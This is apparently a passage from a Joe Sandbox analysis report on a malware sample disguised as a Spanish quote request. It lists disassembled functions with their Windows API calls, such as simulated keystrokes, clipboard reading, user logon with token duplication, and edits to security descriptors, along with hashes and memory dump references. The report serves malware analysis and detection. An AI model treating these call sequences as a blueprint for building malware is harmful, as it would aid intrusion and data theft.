Instruction Fuzzy Hash: C3C09236681304EFF2188B84BC4EF107764E358B00F948003F609B99E3C3A22C20EA50

Function 017865F4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01786609

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: a462bd7eab84e1d98794f028ed1093f6d2337935072eda449f75bd59d20269b7
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 11E0BF7498010DEFDB00EFA4D5496DD7BB4EF04301F1005A1FD05D7681DB309E548A66

Function 017865F8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01786609

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: a2f95031d41059b2e7b482b063e13f7763581a84037c5d7d903a9da7d1b95e0e
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 95E0E67498010DEFDB00EFB4D54969D7FF4EF04301F100161FD01D2281D6309D508A62

Non-executed Functions

Function 00299576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00219BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00219BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0029961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0029965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0029969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002996C9
SendMessageW.USER32 ref: 002996F2
GetKeyState.USER32(00000011), ref: 0029978B
GetKeyState.USER32(00000009), ref: 00299798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002997AE
GetKeyState.USER32(00000010), ref: 002997B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002997E9
SendMessageW.USER32 ref: 00299810
SendMessageW.USER32(?,00001030,?,00297E95), ref: 00299918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0029992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00299941
SetCapture.USER32(?), ref: 0029994A
ClientToScreen.USER32(?,?), ref: 002999AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002999BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002999D6
ReleaseCapture.USER32 ref: 002999E1
GetCursorPos.USER32(?), ref: 00299A19
ScreenToClient.USER32(?,?), ref: 00299A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00299A80
SendMessageW.USER32 ref: 00299AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00299AEB
SendMessageW.USER32 ref: 00299B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00299B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00299B4A
GetCursorPos.USER32(?), ref: 00299B68
ScreenToClient.USER32(?,?), ref: 00299B75
GetParent.USER32(?), ref: 00299B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00299BFA
SendMessageW.USER32 ref: 00299C2B
ClientToScreen.USER32(?,?), ref: 00299C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00299CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00299CDE
SendMessageW.USER32 ref: 00299D01
ClientToScreen.USER32(?,?), ref: 00299D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00299D82

Part of subcall function 00219944: GetWindowLongW.USER32(?,000000EB), ref: 00219952

GetWindowLongW.USER32(?,000000F0), ref: 00299E05

Strings

F, xrefs: 00299D07
@GUI_DRAGID, xrefs: 0029997D
p#-, xrefs: 00299990

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#-
API String ID: 3429851547-2933316088
Opcode ID: a8dffc416c9126e6ef83f799058f99d42559790e54779f897bf7c1c5d0d8cfa2
Instruction ID: 3409c0686f108de0dfbdcc1b6d42577c0a7edce1153e26b9a97666d6e1666e3d
Opcode Fuzzy Hash: a8dffc416c9126e6ef83f799058f99d42559790e54779f897bf7c1c5d0d8cfa2
Instruction Fuzzy Hash: 7D429071624201AFDB24CF68DC58AAABBE9FF49320F10461EF599872A1D771D8B0CF51

Function 00294873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002948F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00294908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00294927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0029494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0029495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0029497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002949AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002949D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00294A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00294A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00294A7E
IsMenu.USER32(?), ref: 00294A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00294AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00294B20
GetWindowLongW.USER32(?,000000F0), ref: 00294B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00294BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00294C82
wsprintfW.USER32 ref: 00294CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00294CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00294CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00294D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00294D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00294D5A

Strings

%d/%02d/%02d, xrefs: 00294CA8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 0d17ca896eacf5533a21b5b3ba3e3ad8b7b494d6e5a638738f1a7574f2f4aebe
Instruction ID: d9020543b743cb95b4c6abbb786103d2ce0cca5e31c7d5852f595f83023084b1
Opcode Fuzzy Hash: 0d17ca896eacf5533a21b5b3ba3e3ad8b7b494d6e5a638738f1a7574f2f4aebe
Instruction Fuzzy Hash: 6B121371620215ABEF28AF24DC49FAE7BF8EF85310F10412AF915EB2E1D7749952CB50

Function 0021F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0021F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0025F474
IsIconic.USER32(00000000), ref: 0025F47D
ShowWindow.USER32(00000000,00000009), ref: 0025F48A
SetForegroundWindow.USER32(00000000), ref: 0025F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0025F4AA
GetCurrentThreadId.KERNEL32 ref: 0025F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0025F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0025F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0025F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0025F4DE
SetForegroundWindow.USER32(00000000), ref: 0025F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0025F4F6
keybd_event.USER32(00000012,00000000), ref: 0025F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0025F50B
keybd_event.USER32(00000012,00000000), ref: 0025F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0025F519
keybd_event.USER32(00000012,00000000), ref: 0025F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0025F528
keybd_event.USER32(00000012,00000000), ref: 0025F52D
SetForegroundWindow.USER32(00000000), ref: 0025F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0025F557

Strings

Shell_TrayWnd, xrefs: 0025F46F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 8a43b5215d6e4b3e2be2c72292cf23a4baacd14f74fb06a0a4ff74cb676b2ff1
Instruction ID: bb79609caa00881b8504aa4160283b57cb795ac918cd9fa6756c829ce8f89cb1
Opcode Fuzzy Hash: 8a43b5215d6e4b3e2be2c72292cf23a4baacd14f74fb06a0a4ff74cb676b2ff1
Instruction Fuzzy Hash: 00319071A50318BBEB206FB56D4EFBF7E6CEB44B50F600026FA04F61D1D6B05D10AAA4

Function 00261201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0026170D
Part of subcall function 002616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0026173A
Part of subcall function 002616C3: GetLastError.KERNEL32 ref: 0026174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00261286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002612A8
CloseHandle.KERNEL32(?), ref: 002612B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002612D1
GetProcessWindowStation.USER32 ref: 002612EA
SetProcessWindowStation.USER32(00000000), ref: 002612F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00261310

Part of subcall function 002610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002611FC), ref: 002610D4
Part of subcall function 002610BF: CloseHandle.KERNEL32(?,?,002611FC), ref: 002610E9

Strings

winsta0, xrefs: 002612CC
default, xrefs: 0026130B
, xrefs: 0026125A
Z,, xrefs: 00261392

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z,
API String ID: 22674027-3239213951
Opcode ID: 64b746f31f13d8aa8deb3a6e520c0bebe44afe797302405c5da7a7d4485bd13e
Instruction ID: 92de5ebcfe62b8706f938e08d600c66c48af3401f0caf2219645eb9457258aff
Opcode Fuzzy Hash: 64b746f31f13d8aa8deb3a6e520c0bebe44afe797302405c5da7a7d4485bd13e
Instruction Fuzzy Hash: CC81AF71910249BFDF119FA4DC49FEE7BB9EF04704F18412AF910A61A0DB71A9B4CB61

Function 00260B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261114
Part of subcall function 002610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 00261120
Part of subcall function 002610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 0026112F
Part of subcall function 002610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 00261136
Part of subcall function 002610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0026114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00260BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00260C00
GetLengthSid.ADVAPI32(?), ref: 00260C17
GetAce.ADVAPI32(?,00000000,?), ref: 00260C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00260C6D
GetLengthSid.ADVAPI32(?), ref: 00260C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00260C8C
HeapAlloc.KERNEL32(00000000), ref: 00260C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00260CB4
CopySid.ADVAPI32(00000000), ref: 00260CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00260CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00260D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00260D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00260D45
HeapFree.KERNEL32(00000000), ref: 00260D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00260D55
HeapFree.KERNEL32(00000000), ref: 00260D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00260D65
HeapFree.KERNEL32(00000000), ref: 00260D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00260D78
HeapFree.KERNEL32(00000000), ref: 00260D7F

Part of subcall function 00261193: GetProcessHeap.KERNEL32(00000008,00260BB1,?,00000000,?,00260BB1,?), ref: 002611A1
Part of subcall function 00261193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260BB1,?), ref: 002611A8
Part of subcall function 00261193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00260BB1,?), ref: 002611B7

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: f33e3eeeea4306680abf170c900927efcfb0c2e7aa2e5659660e261f12301a66
Instruction ID: ee0fb0ee7a7647134d5820eb946b2558c828c8a29920e40da42ccfa74161674a
Opcode Fuzzy Hash: f33e3eeeea4306680abf170c900927efcfb0c2e7aa2e5659660e261f12301a66
Instruction Fuzzy Hash: 3A716B7291020AAFDF10DFA4EC88FAFBBB8FF05300F144626E918A6191D771A955DB60

Function 0027EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0029CC08), ref: 0027EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0027EB37
GetClipboardData.USER32(0000000D), ref: 0027EB43
CloseClipboard.USER32 ref: 0027EB4F
GlobalLock.KERNEL32(00000000), ref: 0027EB87
CloseClipboard.USER32 ref: 0027EB91
GlobalUnlock.KERNEL32(00000000), ref: 0027EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0027EBC9
GetClipboardData.USER32(00000001), ref: 0027EBD1
GlobalLock.KERNEL32(00000000), ref: 0027EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0027EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0027EC38
GetClipboardData.USER32(0000000F), ref: 0027EC44
GlobalLock.KERNEL32(00000000), ref: 0027EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0027EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0027EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0027ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0027ECF3
CountClipboardFormats.USER32 ref: 0027ED14
CloseClipboard.USER32 ref: 0027ED59

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 82f5057185b73262ade629c0ff893b92944c1a929fe86a22e264794ee6de55f3
Instruction ID: 8ae1f2b527ee85516679b1302af1942031d5d901b18228884b7c51e47b606eca
Opcode Fuzzy Hash: 82f5057185b73262ade629c0ff893b92944c1a929fe86a22e264794ee6de55f3
Instruction Fuzzy Hash: 6A61E5742143029FD710EF24D889F2A7BA8BF88704F15959EF85A872A2DB30DD55CB72

Function 0027698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002769BE
FindClose.KERNEL32(00000000), ref: 00276A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00276A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00276A75

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00276AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00276ADF

Strings

%03d, xrefs: 00276DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00276B32
%4d, xrefs: 00276BB1
%02d, xrefs: 00276C00, 00276C0A, 00276C5A, 00276CAA, 00276CFA, 00276D4A
%4d%02d%02d%02d%02d%02d, xrefs: 00276B6A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 82aabe15dd2b75aad9a300e848dd6617c0d343ad8ff761eec4b2c411dbbd87b3
Instruction ID: b499229ecbd52ab77bb5ce92905e9de8a4757077d39ed0fa9fedec7c3bbc5eea
Opcode Fuzzy Hash: 82aabe15dd2b75aad9a300e848dd6617c0d343ad8ff761eec4b2c411dbbd87b3
Instruction Fuzzy Hash: 66D173B1518301AFC310EFA0C985EABB7ECAF98704F44491EF589D7192EB74DA54CB62

Function 00279642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00279663
GetFileAttributesW.KERNEL32(?), ref: 002796A1
SetFileAttributesW.KERNEL32(?,?), ref: 002796BB
FindNextFileW.KERNEL32(00000000,?), ref: 002796D3
FindClose.KERNEL32(00000000), ref: 002796DE
FindFirstFileW.KERNEL32(*.*,?), ref: 002796FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0027974A
SetCurrentDirectoryW.KERNEL32(002C6B7C), ref: 00279768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00279772
FindClose.KERNEL32(00000000), ref: 0027977F
FindClose.KERNEL32(00000000), ref: 0027978F

Strings

*.*, xrefs: 002796F5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 09b9ffb0dc0fb2e5b5b2b08a0fc98fbbf5fd984b2705b80eac4dbf9ea3a06912
Instruction ID: fe41aaead8092e5c80780116033f272872798f4d934faaaae5fc72f5aa7dc9df
Opcode Fuzzy Hash: 09b9ffb0dc0fb2e5b5b2b08a0fc98fbbf5fd984b2705b80eac4dbf9ea3a06912
Instruction Fuzzy Hash: 5D31A47256131A6ADB14DFB4EC4DEEE77AC9F09320F108256E819E2190DB30DD948A24

Function 0027979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002797BE
FindNextFileW.KERNEL32(00000000,?), ref: 00279819
FindClose.KERNEL32(00000000), ref: 00279824
FindFirstFileW.KERNEL32(*.*,?), ref: 00279840
SetCurrentDirectoryW.KERNEL32(?), ref: 00279890
SetCurrentDirectoryW.KERNEL32(002C6B7C), ref: 002798AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002798B8
FindClose.KERNEL32(00000000), ref: 002798C5
FindClose.KERNEL32(00000000), ref: 002798D5

Part of subcall function 0026DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0026DB00

Strings

*.*, xrefs: 0027983B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 81321c90b2245b17f88db918110b17c8d5c3373eb49bcee8fadc31983af16056
Instruction ID: f2fac32b5af57790aeff84d32dd34c94c34fd2050e902e3568fe7630fe70b797
Opcode Fuzzy Hash: 81321c90b2245b17f88db918110b17c8d5c3373eb49bcee8fadc31983af16056
Instruction Fuzzy Hash: 5731A33155171A7ADF10EFB4EC48EDE77AC9F06324F2481A6E818A21D0DB70DDA4CE65

Function 00278195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00278257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00278267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00278273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00278310
SetCurrentDirectoryW.KERNEL32(?), ref: 00278324
SetCurrentDirectoryW.KERNEL32(?), ref: 00278356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0027838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00278395

Strings

*.*, xrefs: 0027839B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 5c69197f6291fa83c634ff62643d92503b8bfc92d589f420210a5b7da329f2fe
Instruction ID: e0a64cdc8e2ab870bec09fcdc79919d2311982fd8a38bbb179a1db156fd42273
Opcode Fuzzy Hash: 5c69197f6291fa83c634ff62643d92503b8bfc92d589f420210a5b7da329f2fe
